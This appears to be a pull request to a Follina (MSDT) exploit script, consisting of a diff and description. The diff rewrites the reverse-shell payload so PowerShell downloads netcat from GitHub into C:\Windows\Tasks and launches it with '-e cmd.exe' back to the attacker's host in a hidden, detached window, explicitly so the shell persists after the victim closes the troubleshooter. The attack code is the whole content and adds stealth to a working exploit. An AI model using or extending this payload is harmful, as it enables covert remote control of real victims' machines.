### PR TITLE
Modify reverse shell command to persist after troubleshooter is closed

### DIFF
--- a/follina.py
+++ b/follina.py
@@ -108,7 +108,12 @@ def main(args):
 
     command = args.command
     if args.reverse:
-        command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
+        command = (
+            f"Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true "
+            f"-OutFile C:\\Windows\\Tasks\\nc.exe; "
+            f"Start-Process -FilePath C:\\Windows\\Tasks\\nc.exe "
+            f"-ArgumentList '-e cmd.exe {serve_host} {args.reverse}' -WindowStyle Hidden"
+        )
 
     # Base64 encode our command so whitespace is respected
     base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")


### PR DESCRIPTION
Replaced direct cmd execution with Start-Process to launch nc.exe in a detached and hidden window. This ensures the reverse shell remains active even if the MSDT troubleshooter interface is closed by the user. Improves the reliability of the Follina exploit demo in real-world testing scenarios.